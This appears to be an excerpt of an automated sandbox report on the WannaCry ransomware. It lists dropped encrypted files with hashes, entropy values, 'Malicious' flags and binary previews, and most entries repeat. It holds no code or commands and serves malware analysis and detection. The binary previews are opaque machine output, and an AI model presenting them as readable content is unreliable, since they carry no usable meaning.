                                                                              Preview:WANACRY!....Ys.kfn...X.6IV6......&.z.B.... ..o....D.@..K.H.E.~..W....ng...R...t .L.-.Y..|/.....]d....A:.I.....&..O,.zO....5nm...sZ.{.+.+..E.....c.....7..4...........Gb..J....=K(...S.:...}6FQf..V6..D..V.;...Rg.... ...l..u..g9,......u5S..b......(A~.v&.>.......?......UL.|,.[p._..k.7j.s..i(..."P"...paa*..^..vF$Q.1..".0...*K.-..w|....K...~..;..vnj..e.8.!;..iQp...dZ..=..h..g..Z..y..a.Q..&.H..b..M.*.....>,$U.....m.s.~......>..b2*...+..=8..f.'".K...$u,PX.....y.....{:7.jo...)#L.).V....B.Wz.].......c...,5...^D....,...-2e.t...~.~..f.N..'y..%R..d..rk.....Ut.....P.......5V{..']..<.\....]...dY..,?._...V.........1.....N..c.P..s..}Xt..D&|0c.0c.$.N.....'..h{...bo..)t..]7s..n9......q....wBU......(i.! .V."g$|.....1O.#..R...^O...8...7!......~..Q}..0.....?R..J1U...O...<.Mz@.S.0...y..f.!...o.....xb.?$.....e?..{....:.3.6t.........E.,.....u.`.^....rJ!..1Ojj..d^L...]#PW.....4......2^.@).5PM...z.....*fQ..A......j.|R...k.0.\.:;."h..=lE.....S..........f.?..<....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):344344
                                                                              Entropy (8bit):7.999455231845374
                                                                              Encrypted:true
                                                                              SSDEEP:6144:VEHl28cdQusszzBtkE/ZpTOpIaHguNEZo6mmvS+4+cWYd7S5LPNQp+DbaM+nFn0i:Ql2JSIYE/ZpTOOaHgqEZo6m0S+jWELPg
                                                                              MD5:67A6F44A934D6FAEF287EA3FA75C20DC
                                                                              SHA1:6BA2A6AED3BCA0EFF88E6F750CF8D190ADDDCFB8
                                                                              SHA-256:E811A084BF7F1E2A7F82E3B394DE0FD59EA6A464012A419BF74FA7F22595CD7C
                                                                              SHA-512:802913D79DCD898D7479B4CAEF14C2286644393E6D974EA19D00D45BE685157B26CEEC6F025FEF82937A57F069BCB529AFB69E034FB7FC69E4AAE39BAAC05FCE
                                                                              Malicious:true
                                                                              Preview:WANACRY!....Ys.kfn...X.6IV6......&.z.B.... ..o....D.@..K.H.E.~..W....ng...R...t .L.-.Y..|/.....]d....A:.I.....&..O,.zO....5nm...sZ.{.+.+..E.....c.....7..4...........Gb..J....=K(...S.:...}6FQf..V6..D..V.;...Rg.... ...l..u..g9,......u5S..b......(A~.v&.>.......?......UL.|,.[p._..k.7j.s..i(..."P"...paa*..^..vF$Q.1..".0...*K.-..w|....K...~..;..vnj..e.8.!;..iQp...dZ..=..h..g..Z..y..a.Q..&.H..b..M.*.....>,$U.....m.s.~......>..b2*...+..=8..f.'".K...$u,PX.....y.....{:7.jo...)#L.).V....B.Wz.].......c...,5...^D....,...-2e.t...~.~..f.N..'y..%R..d..rk.....Ut.....P.......5V{..']..<.\....]...dY..,?._...V.........1.....N..c.P..s..}Xt..D&|0c.0c.$.N.....'..h{...bo..)t..]7s..n9......q....wBU......(i.! .V."g$|.....1O.#..R...^O...8...7!......~..Q}..0.....?R..J1U...O...<.Mz@.S.0...y..f.!...o.....xb.?$.....e?..{....:.3.6t.........E.,.....u.`.^....rJ!..1Ojj..d^L...]#PW.....4......2^.@).5PM...z.....*fQ..A......j.|R...k.0.\.:;."h..=lE.....S..........f.?..<....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7752
                                                                              Entropy (8bit):7.9774816732108835
                                                                              Encrypted:false
                                                                              SSDEEP:192:YHjDcl5LmVSDb5Qi/DevlTlyZtLipOLvHJK:MDiLmVSDbairevAjU
                                                                              MD5:AD82E2F8D7713DEDAC113F81C2C711D6
                                                                              SHA1:91EBC5826164E663E2E88D20814021AE0046A3DA
                                                                              SHA-256:DF97CB86F71A794DB4C5003E4C41DCD462EFC0CFB2A5E3D0C3B2FDF1BCA61FC7
                                                                              SHA-512:292C6DA0C5A48C5CE484C6C20831C05609C0C0FBA33160494E60296911B2FE6216EBE4A0408834EBD0F4AC3B121159C294F9F1D364D1E0777ECBFE6FA266654B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....M..Hj.....-.E~m&......H9.3.d^%..F%...e.S.....]"v.>.=..=F_.l...x.4.@..o^..+.xr.{.5.L..%.i...c.z.1.N..Z.,(.B.)...=.#...Q..{..6.tX..>/t..a.........~......w.d......q..`.L.j.|......}......zA....p..._UW...uXV....c....Z..=.....Z`.Z..^.>`Y.h.|.1.g,.s........$..........C...v..s....D.Dt....6(.r.B.#.n7r.qh@.lcK...2u(YR..NTVcA.o......P.y.3..!.Nc.......1G..+f.|./Q4jY{....u...m>.H...."@.?LW..$t. .&.1%jOeA........:..H[.4~..O|*%+..L=Wmd.-....^......>%.YN8...............%..(..:t.......{...2r..l..F...X.yxj.~2G.wE.9..e7.nmC2:..!.(o......'W...&..t...L......R.....e...*..DV.I..'...<|.?.F..9.....+_..gc....{...ya.=....G5..w.......ev..v.....".....E.....y.*#c..UK........y..s.>j................h?X...#..qs.....&.&F......[....`V..p..".*.mO.`.....<2.sX.{.@.sLU3.$..4.Z..>.\.t....V../Y.K.....j.>..L.).[..J...........G.h....1A.U...#m.'...o..j-..7.Ms.^....rW._.y.G...,.....`k.&...#.......V."..2...T....#..ByFk....|..........:......4a....A... ..hJh(.*.z..P.l3 .o
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7752
                                                                              Entropy (8bit):7.9774816732108835
                                                                              Encrypted:false
                                                                              SSDEEP:192:YHjDcl5LmVSDb5Qi/DevlTlyZtLipOLvHJK:MDiLmVSDbairevAjU
                                                                              MD5:AD82E2F8D7713DEDAC113F81C2C711D6
                                                                              SHA1:91EBC5826164E663E2E88D20814021AE0046A3DA
                                                                              SHA-256:DF97CB86F71A794DB4C5003E4C41DCD462EFC0CFB2A5E3D0C3B2FDF1BCA61FC7
                                                                              SHA-512:292C6DA0C5A48C5CE484C6C20831C05609C0C0FBA33160494E60296911B2FE6216EBE4A0408834EBD0F4AC3B121159C294F9F1D364D1E0777ECBFE6FA266654B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....M..Hj.....-.E~m&......H9.3.d^%..F%...e.S.....]"v.>.=..=F_.l...x.4.@..o^..+.xr.{.5.L..%.i...c.z.1.N..Z.,(.B.)...=.#...Q..{..6.tX..>/t..a.........~......w.d......q..`.L.j.|......}......zA....p..._UW...uXV....c....Z..=.....Z`.Z..^.>`Y.h.|.1.g,.s........$..........C...v..s....D.Dt....6(.r.B.#.n7r.qh@.lcK...2u(YR..NTVcA.o......P.y.3..!.Nc.......1G..+f.|./Q4jY{....u...m>.H...."@.?LW..$t. .&.1%jOeA........:..H[.4~..O|*%+..L=Wmd.-....^......>%.YN8...............%..(..:t.......{...2r..l..F...X.yxj.~2G.wE.9..e7.nmC2:..!.(o......'W...&..t...L......R.....e...*..DV.I..'...<|.?.F..9.....+_..gc....{...ya.=....G5..w.......ev..v.....".....E.....y.*#c..UK........y..s.>j................h?X...#..qs.....&.&F......[....`V..p..".*.mO.`.....<2.sX.{.@.sLU3.$..4.Z..>.\.t....V../Y.K.....j.>..L.).[..J...........G.h....1A.U...#m.'...o..j-..7.Ms.^....rW._.y.G...,.....`k.&...#.......V."..2...T....#..ByFk....|..........:......4a....A... ..hJh(.*.z..P.l3 .o
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2344
                                                                              Entropy (8bit):7.9115269371259
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkVG0OC4y6f0zhTGsK3wj7ydsad2SCKck0ZvRU/hZbKKhoDDcb9SOG7eCLYGRyIe:oYSH6f0zhXk0XadQpRkVKsoDA9rGhYeI
                                                                              MD5:2EA396E20BC964F547985B348B66FE37
                                                                              SHA1:7255E0436DE993472AB8ADCE52610B4C8BBA7198
                                                                              SHA-256:6A31E6747B46F18DF7F0D6B447F1CE0BF2F3548BDEC71AA6B3E1AD871887E939
                                                                              SHA-512:4624A3B5D22C50AE1D8EB8EBABE4703CD0FCA7486D11CEFB706D1720C4760A9B5DB3FCB7C87A9DB9D3B2FDC99F339CCBC31BE04165E60D2FAC161E13AA104988
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Sq.Y.yjv......v...<..?C:D]..2rP.-I....&...<D... .~(..Y............/d..FY..N..I..'.]..{..........t../..J;m..n.x.PQTy...(...H..e.8...sb5X...6....%.9}.......6(...&...:.....s.F\...)a)...............nQ.P5W..J....31DV.<..a...Rm.....|...S5.L. .]u............m.i...|%..f....S...z.%...........$l....g.M...f.OwU..u.Y.5*..OGi.:.{..._..>.(.....J9.?.;o......[.n.....N.D....n..X%.. ....0......@9cz.5`R.OnJX...+1..\].......z.G.....U....1pRn.........xE.1.{..:.y..'...e$$V..E..R..0.s8i% ..Wx>..A...WN...K..l.w...7,[.."....n...D...\....-.........yE%.....V:.B`N.".zTk.....Cc.."[..#.y.R..V.3d..E.,.+@...0.....[.%N.-..,...R...3............z.T[21X=@..o.....aL..q%l.4...|.....xE?....F.qd.....3Rt..../..b.>`..'.,....Y~0_-cL"+...7.......~..j..[....q..1........{A,.........a."P.$.....C..K.....kz...d..r....&.9.&....0/..U......U..|.rq.......t...l.(...Q%.c.+...F....../.. ...Zs$5.....i....O..}...FNy_...*.5|\B."...z.........^.P.g..//..DXR.zU. .!.....%a@...r.....@8..[f+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2344
                                                                              Entropy (8bit):7.9115269371259
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkVG0OC4y6f0zhTGsK3wj7ydsad2SCKck0ZvRU/hZbKKhoDDcb9SOG7eCLYGRyIe:oYSH6f0zhXk0XadQpRkVKsoDA9rGhYeI
                                                                              MD5:2EA396E20BC964F547985B348B66FE37
                                                                              SHA1:7255E0436DE993472AB8ADCE52610B4C8BBA7198
                                                                              SHA-256:6A31E6747B46F18DF7F0D6B447F1CE0BF2F3548BDEC71AA6B3E1AD871887E939
                                                                              SHA-512:4624A3B5D22C50AE1D8EB8EBABE4703CD0FCA7486D11CEFB706D1720C4760A9B5DB3FCB7C87A9DB9D3B2FDC99F339CCBC31BE04165E60D2FAC161E13AA104988
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Sq.Y.yjv......v...<..?C:D]..2rP.-I....&...<D... .~(..Y............/d..FY..N..I..'.]..{..........t../..J;m..n.x.PQTy...(...H..e.8...sb5X...6....%.9}.......6(...&...:.....s.F\...)a)...............nQ.P5W..J....31DV.<..a...Rm.....|...S5.L. .]u............m.i...|%..f....S...z.%...........$l....g.M...f.OwU..u.Y.5*..OGi.:.{..._..>.(.....J9.?.;o......[.n.....N.D....n..X%.. ....0......@9cz.5`R.OnJX...+1..\].......z.G.....U....1pRn.........xE.1.{..:.y..'...e$$V..E..R..0.s8i% ..Wx>..A...WN...K..l.w...7,[.."....n...D...\....-.........yE%.....V:.B`N.".zTk.....Cc.."[..#.y.R..V.3d..E.,.+@...0.....[.%N.-..,...R...3............z.T[21X=@..o.....aL..q%l.4...|.....xE?....F.qd.....3Rt..../..b.>`..'.,....Y~0_-cL"+...7.......~..j..[....q..1........{A,.........a."P.$.....C..K.....kz...d..r....&.9.&....0/..U......U..|.rq.......t...l.(...Q%.c.+...F....../.. ...Zs$5.....i....O..}...FNy_...*.5|\B."...z.........^.P.g..//..DXR.zU. .!.....%a@...r.....@8..[f+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1880
                                                                              Entropy (8bit):7.894032442913012
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkPVy3QY+s8qVObtRG4o3ZPWH6jpxiWFs1:otUp+5G739W6jpx0
                                                                              MD5:24F4EF9ABD4677166C52839362BFABEB
                                                                              SHA1:A4C24DC5E284C8F55C4294BAE94564EED4A3A436
                                                                              SHA-256:429B76E833FDA85FAD693928C8EDB4D27D1BB256DCCBD9964F7E2792B353DD32
                                                                              SHA-512:A7DB82A6AEB0EF5324902DD95B0DA361467CA9C551059EA7BE6936130C42FA9AA066AF078E017CD21F7C9804C688C3E1DD2023BA07DFBEC58FBF3BC68F8503A7
                                                                              Malicious:false
                                                                              Preview:WANACRY!........S.1..E&......z.P@.*6..R.w|...jG.;.WM.....);j)X..B..J.j..X...../.p..u..8.T.A.........y...:....ABK..v=.&..6t...B.\...g...6...i.H...Ba..%/2.f3.d...Xu1a...{.p8.....z....NI.$..X..s..g.j.g_C........C.?....]R:.sL5.K.Tu3.+..{q..xG..Cvi.X!.?..H....o.....3.......?,U...O.".....>....mw.....Mq..0..)./,S..?X.A.^..Z)..I+. -...........zs..2..M."2M?.*..?VG.@{kZ.@..Q...9iS.|....?Ua...."....r..Tm\k....(X..9B..$...nN...TO.z7.."G......J=G..8..s.R.n&P..S.US<5{....M^eW...J...x.e.gtKgg.IR;..N;.1d...2..<..&S..<....q..$.......b...%u.x.Z.,.0.......4...y..p..z...Q..P.y....X.aX'".....|....>...yYK1mW...&/I:.c.1s$......0...f/..j3D..{p.....W........K.l.&0~.y....5.L.P.M!...=..n.....b.;8 _z...T..B.0N.g.s..m........?[..j.p...H.M..6....t*.k.S.N..c.v....KL....RL.....Y...w.)!#QQ.....gH..I...u)....R.@...]..5.A...gU..\.~.-.\j.._..-0|.'J.X.3.jQ;.H...StN..)M.Y..: s.xQ94&....":<O."JO..y$.+...'...?......#..M||.D.+X.N@.......b..6..!.....q0 .6..I..J2n+...q.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1880
                                                                              Entropy (8bit):7.894032442913012
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkPVy3QY+s8qVObtRG4o3ZPWH6jpxiWFs1:otUp+5G739W6jpx0
                                                                              MD5:24F4EF9ABD4677166C52839362BFABEB
                                                                              SHA1:A4C24DC5E284C8F55C4294BAE94564EED4A3A436
                                                                              SHA-256:429B76E833FDA85FAD693928C8EDB4D27D1BB256DCCBD9964F7E2792B353DD32
                                                                              SHA-512:A7DB82A6AEB0EF5324902DD95B0DA361467CA9C551059EA7BE6936130C42FA9AA066AF078E017CD21F7C9804C688C3E1DD2023BA07DFBEC58FBF3BC68F8503A7
                                                                              Malicious:false
                                                                              Preview:WANACRY!........S.1..E&......z.P@.*6..R.w|...jG.;.WM.....);j)X..B..J.j..X...../.p..u..8.T.A.........y...:....ABK..v=.&..6t...B.\...g...6...i.H...Ba..%/2.f3.d...Xu1a...{.p8.....z....NI.$..X..s..g.j.g_C........C.?....]R:.sL5.K.Tu3.+..{q..xG..Cvi.X!.?..H....o.....3.......?,U...O.".....>....mw.....Mq..0..)./,S..?X.A.^..Z)..I+. -...........zs..2..M."2M?.*..?VG.@{kZ.@..Q...9iS.|....?Ua...."....r..Tm\k....(X..9B..$...nN...TO.z7.."G......J=G..8..s.R.n&P..S.US<5{....M^eW...J...x.e.gtKgg.IR;..N;.1d...2..<..&S..<....q..$.......b...%u.x.Z.,.0.......4...y..p..z...Q..P.y....X.aX'".....|....>...yYK1mW...&/I:.c.1s$......0...f/..j3D..{p.....W........K.l.&0~.y....5.L.P.M!...=..n.....b.;8 _z...T..B.0N.g.s..m........?[..j.p...H.M..6....t*.k.S.N..c.v....KL....RL.....Y...w.)!#QQ.....gH..I...u)....R.@...]..5.A...gU..\.~.-.\j.._..-0|.'J.X.3.jQ;.H...StN..)M.Y..: s.xQ94&....":<O."JO..y$.+...'...?......#..M||.D.+X.N@.......b..6..!.....q0 .6..I..J2n+...q.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2152
                                                                              Entropy (8bit):7.919781250739578
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk2qq2DUHPHVDU0YqSMBw/5kGjpdNc9dSlFlRlLGi54j1:o2qZUHPtYRqe5kGjnRdJ2
                                                                              MD5:37348B8B66FBF6F4ADEE57920DCD3BBF
                                                                              SHA1:E2BE155F1E77B4F95BE3F1CD8EA013C7C78FB802
                                                                              SHA-256:593FDD499B72BCA725A7F322A8496C8D2A4B9A385F88A4B9D522C5A86E82D4B1
                                                                              SHA-512:075412B0B10BADEEF31EAF196DD9D5D72C0CD9A9FD5C199B81AEE200EA46A042FCF07DB5DB3E12DC26A392853CAA4A0D7F4933902DBA9961AF88EAF0F8B56EAD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....{..iQ....z\...6....a+...a..(..m..'........m.7.n:R ~....*.Z.{..8..d..u...,J./........z....Z!....#&...'...a...d.H.j........Y(.A....q?MI.v./:.+.1gOX}....D.5."k-.....'.z....L.Aa........-c[.........H.. .........O.f..D..:....Bmp...;.%;.!.=..z.r...>y..F....C.......:..h)HU49(..R..w.[.%h./...O}...6P........(...(....O..P".^..@m,2.f..=....VJ... ~.....dR.....B&..O...........4.;.{.!....(..|.NH:.h.7g.F...G.C......~....l..+....Hz..s.@.....\Qdg...4...cB.V..].m..(..^9,...J.xXT.....Bow!...E.r...8T.w.^.....[...h.....mzt...|X#.[g.....[Q...f:...s..\Z^p)E...)$}^.G.^6R.}"~...;..y.A...mim..H..m+r...I.s...o-M.P<..f..*.DPE_.j.l.4.H8..^....p....oI..}8p.^..G....(3...B.|.hU.........t+{.......*....gq.`~.."P.#8.....9.j.GI=....I.c..~D...)=i..'...[..g.F`.../.g(._.f...2...4......h.c.B..y.rp...'..a....v...m.W.i_. .Q../N.......u.'....^...+$;..0......%.tY{.V. .CS....d.}.,Q...dU..}.G.....6.H&d.G...O.x..*,...#>..#G....Z....L.O..l...4...7...E..D.k..2...X......j...;...g..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2152
                                                                              Entropy (8bit):7.919781250739578
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk2qq2DUHPHVDU0YqSMBw/5kGjpdNc9dSlFlRlLGi54j1:o2qZUHPtYRqe5kGjnRdJ2
                                                                              MD5:37348B8B66FBF6F4ADEE57920DCD3BBF
                                                                              SHA1:E2BE155F1E77B4F95BE3F1CD8EA013C7C78FB802
                                                                              SHA-256:593FDD499B72BCA725A7F322A8496C8D2A4B9A385F88A4B9D522C5A86E82D4B1
                                                                              SHA-512:075412B0B10BADEEF31EAF196DD9D5D72C0CD9A9FD5C199B81AEE200EA46A042FCF07DB5DB3E12DC26A392853CAA4A0D7F4933902DBA9961AF88EAF0F8B56EAD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....{..iQ....z\...6....a+...a..(..m..'........m.7.n:R ~....*.Z.{..8..d..u...,J./........z....Z!....#&...'...a...d.H.j........Y(.A....q?MI.v./:.+.1gOX}....D.5."k-.....'.z....L.Aa........-c[.........H.. .........O.f..D..:....Bmp...;.%;.!.=..z.r...>y..F....C.......:..h)HU49(..R..w.[.%h./...O}...6P........(...(....O..P".^..@m,2.f..=....VJ... ~.....dR.....B&..O...........4.;.{.!....(..|.NH:.h.7g.F...G.C......~....l..+....Hz..s.@.....\Qdg...4...cB.V..].m..(..^9,...J.xXT.....Bow!...E.r...8T.w.^.....[...h.....mzt...|X#.[g.....[Q...f:...s..\Z^p)E...)$}^.G.^6R.}"~...;..y.A...mim..H..m+r...I.s...o-M.P<..f..*.DPE_.j.l.4.H8..^....p....oI..}8p.^..G....(3...B.|.hU.........t+{.......*....gq.`~.."P.#8.....9.j.GI=....I.c..~D...)=i..'...[..g.F`.../.g(._.f...2...4......h.c.B..y.rp...'..a....v...m.W.i_. .Q../N.......u.'....^...+$;..0......%.tY{.V. .CS....d.}.,Q...dU..}.G.....6.H&d.G...O.x..*,...#>..#G....Z....L.O..l...4...7...E..D.k..2...X......j...;...g..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1608
                                                                              Entropy (8bit):7.887469645554426
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkgv6IMSILmYWE6dtAUIIN8OpvUuiHWsY2FvjvntZb7YLRaPki2SMjhscX/zVRou:bknI3xJIIyOpveHtZb7YtknMjqcvzVGu
                                                                              MD5:9041959A06533688655DC2BF36899FB9
                                                                              SHA1:F0BD4803C5EA2C3813A42C1081D71DF4854E43B3
                                                                              SHA-256:7CA1A2B2602BB5DA198BDAD6EED1542B110A5BCDFA2B22B1A86FA337AD12D4B4
                                                                              SHA-512:3CB0850BA15664A0EAAAC338489CC07D0EF80D8DF69D68F489B2434A865A70E4B3AFCAD787F63340C5A2BE740888BD0EC9BDF8DEF9DCC38CF1154037AB812DA5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....5..J..A....q..k7:,..|.ac..6...k..2Y..i.F#J..X..s..v...........]Z...9S..V..?.....r...c..P]J.w.D*G\.m<D ./.6.?.,Dm.*.&.,@........^..f.R.Q..$...&..l..v..djK.Wf....N"..P.Q....A.........6..@bx.I..qF.-\.G^.].%.6w........o....P..). h.. ojG....\....#...........) 1$..(>5B..L.....RR..s......X..5...).k0.._H....|..a.J.....Ot...#n...^..,..L{....Ss.a'g.I1..;..HmoeNVK..".B..I.>.Hx?A..ns..Y.z..?I....5G....(.1.Q.r.HDu..@ [..$l7y$...n...f.".s..u...>;.~.i..A'.z.+.OJ....U.V.j.d.SV<......^.6..EN...Uh?..v....8.NKW.1.e`i.....5...\.!.{.l8DD$..b<...M.L.!...p..*+W....x7.]>Y..... .....U..u.b}..Z..5o..%...!..O.....Ok'...4Na;w........?+....pf.5.Vm.Z...Itw9......E..5S.../.J..oWn.T.A.l|>^>...].v@\f........j.....*. .+.......jF1.Itn.H...`...Ej...<b.....l.y....+.<.^.1.T...."...x.&.2...-.<P|<C.......6....+.F.r...o.....5.y....d.=NQi....<k.....Bc.M.8l.../..P:..9 N.~,.....].7.....7K:H.V...,...1t...M...:..eD..9qV...G-M...h.....z.....#...b...Ud.'..;^...jO.-..P.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1608
                                                                              Entropy (8bit):7.887469645554426
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkgv6IMSILmYWE6dtAUIIN8OpvUuiHWsY2FvjvntZb7YLRaPki2SMjhscX/zVRou:bknI3xJIIyOpveHtZb7YtknMjqcvzVGu
                                                                              MD5:9041959A06533688655DC2BF36899FB9
                                                                              SHA1:F0BD4803C5EA2C3813A42C1081D71DF4854E43B3
                                                                              SHA-256:7CA1A2B2602BB5DA198BDAD6EED1542B110A5BCDFA2B22B1A86FA337AD12D4B4
                                                                              SHA-512:3CB0850BA15664A0EAAAC338489CC07D0EF80D8DF69D68F489B2434A865A70E4B3AFCAD787F63340C5A2BE740888BD0EC9BDF8DEF9DCC38CF1154037AB812DA5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....5..J..A....q..k7:,..|.ac..6...k..2Y..i.F#J..X..s..v...........]Z...9S..V..?.....r...c..P]J.w.D*G\.m<D ./.6.?.,Dm.*.&.,@........^..f.R.Q..$...&..l..v..djK.Wf....N"..P.Q....A.........6..@bx.I..qF.-\.G^.].%.6w........o....P..). h.. ojG....\....#...........) 1$..(>5B..L.....RR..s......X..5...).k0.._H....|..a.J.....Ot...#n...^..,..L{....Ss.a'g.I1..;..HmoeNVK..".B..I.>.Hx?A..ns..Y.z..?I....5G....(.1.Q.r.HDu..@ [..$l7y$...n...f.".s..u...>;.~.i..A'.z.+.OJ....U.V.j.d.SV<......^.6..EN...Uh?..v....8.NKW.1.e`i.....5...\.!.{.l8DD$..b<...M.L.!...p..*+W....x7.]>Y..... .....U..u.b}..Z..5o..%...!..O.....Ok'...4Na;w........?+....pf.5.Vm.Z...Itw9......E..5S.../.J..oWn.T.A.l|>^>...].v@\f........j.....*. .+.......jF1.Itn.H...`...Ej...<b.....l.y....+.<.^.1.T...."...x.&.2...-.<P|<C.......6....+.F.r...o.....5.y....d.=NQi....<k.....Bc.M.8l.../..P:..9 N.~,.....].7.....7K:H.V...,...1t...M...:..eD..9qV...G-M...h.....z.....#...b...Ud.'..;^...jO.-..P.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):408
                                                                              Entropy (8bit):7.384036336217061
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEgWDygQIOkyOQI60Wi7M7mG0vz8PlyPA2YRx5yA/mnjMk6zdYfYOZd7e2KpQ:bkE3yIOkyzIF76mjqg42YRgnjozEZCpQ
                                                                              MD5:6740D3B78A8F777EC49FEB03D057DDAE
                                                                              SHA1:C0D7F5CDDB911085D7F4E0B425A2627C990870A5
                                                                              SHA-256:D300693B4286BB69463B449FFA805FDB24488D286894279A3544C44B3E248F8F
                                                                              SHA-512:BE7B1EA11521E4B66B23F307F96FFCFE3E04B0EF291BA96D173B42F2D19D7168EFFB162E26C0BFD37E4B633970208C69061901EF41E4F9E5B03F32826C4899FA
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........2..Yd.^..,i..%{..-.2m..1.E.@.n.THQ..U.i...6.0.r)..=....M.RR...U...;..[sB6.p.SB...v.M.z3...w!../...f..K..=...>.~QG..<......cD.o.f.3..!y.E.W.Z......Bt...Q8./X.o..",.....'..<*.=..!.0.J.=_......%Q.'UeH.j...%.........I(uTr}..'[:. ;...gf.ho...sy....q........V..o....|b))T....D......B..TAPU......C.f..!u..#UiO.....jI..+,W0...C..*..nk.7...{.&.5'.c..)..kP..{...!../W f9..b#.bu...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):408
                                                                              Entropy (8bit):7.384036336217061
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEgWDygQIOkyOQI60Wi7M7mG0vz8PlyPA2YRx5yA/mnjMk6zdYfYOZd7e2KpQ:bkE3yIOkyzIF76mjqg42YRgnjozEZCpQ
                                                                              MD5:6740D3B78A8F777EC49FEB03D057DDAE
                                                                              SHA1:C0D7F5CDDB911085D7F4E0B425A2627C990870A5
                                                                              SHA-256:D300693B4286BB69463B449FFA805FDB24488D286894279A3544C44B3E248F8F
                                                                              SHA-512:BE7B1EA11521E4B66B23F307F96FFCFE3E04B0EF291BA96D173B42F2D19D7168EFFB162E26C0BFD37E4B633970208C69061901EF41E4F9E5B03F32826C4899FA
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........2..Yd.^..,i..%{..-.2m..1.E.@.n.THQ..U.i...6.0.r)..=....M.RR...U...;..[sB6.p.SB...v.M.z3...w!../...f..K..=...>.~QG..<......cD.o.f.3..!y.E.W.Z......Bt...Q8./X.o..",.....'..<*.=..!.0.J.=_......%Q.'UeH.j...%.........I(uTr}..'[:. ;...gf.ho...sy....q........V..o....|b))T....D......B..TAPU......C.f..!u..#UiO.....jI..+,W0...C..*..nk.7...{.&.5'.c..)..kP..{...!../W f9..b#.bu...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):58984
                                                                              Entropy (8bit):7.996859242105941
                                                                              Encrypted:true
                                                                              SSDEEP:1536:x/ABbAelvE698iVzGvL4lTJuNKIiIXO/csqOs33wz6:xmJcy6T0iD55TB
                                                                              MD5:32AF38B99D6C73D6E14284570D38F07B
                                                                              SHA1:CCF3D91A93102BE787A17923D6F35109CFE546CD
                                                                              SHA-256:2A129417CF169D09F8FCA5DAB10EE8AF093F4652027101468DC6A8BAD2B670D6
                                                                              SHA-512:2A14307A6436A7ABC396073BF6EABC35FEA294E42BF072E4E813B514C446D58430A5E8FAC123761463DFFCDA73A779C6044519530D0A3623568D5A9FB80AC5EA
                                                                              Malicious:true
                                                                              Preview:WANACRY!....AU.h.r.*3.DO/.......a..>...L-..!....j..#.X.N....l.UI.U....4....~NEQPq<.-l.+d.]L...^.. .\r...._s.,.1.v.g~.7.cm.>"d".tc.I.8...1...8H. S3..HU.U(f(.BF.k...P.q..j`)hN........)0e.y.(Lx...i.".HH)...c..G........BE....uJ...;.......+qr.|.T$.c....n:.......G............t.1ej...#.(.R.AZ.Wf[...v0K..g.B..x.tOU.0.j..r......5."..U.Uc.f`..N.z.-...'-..H...L7..ku..../l....=.........y*.YO.. ...(Ih.='.m..Y.b^[#..j..P.s...."&.OoJ...GQ1.._.G......A.R....cH.....u}.....X.v2..tj.....a)+......Y.y....%.-..,.q./H...F..=.|.4....F.Ix..25n>. ....Q..E_...yw3..?7#.$..%>.TT.H.^.P.sF.c.....Sma..o.....o>....N..F*}...L..%Q......U...b ,...]....1q.4...}Dns....J.1...;..o;.w.(....M m._.....*..e....x..v.,..}..;..[T..0.r..+........SvS...-..l......z.7WK..y.2...L.]...D..X.`..cxTu......bo.P.,:..G..=..3.n.#{..P.my...sF.m.tc..Ii...J..H...(...<..X..9..9....B..p.......z..:.W....M^..`....#....X.W<.0duT.......!.w..g{......F:.{q`.....iC.."..r..~N]....%..<...b@.:=.....m.YU.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):58984
                                                                              Entropy (8bit):7.996859242105941
                                                                              Encrypted:true
                                                                              SSDEEP:1536:x/ABbAelvE698iVzGvL4lTJuNKIiIXO/csqOs33wz6:xmJcy6T0iD55TB
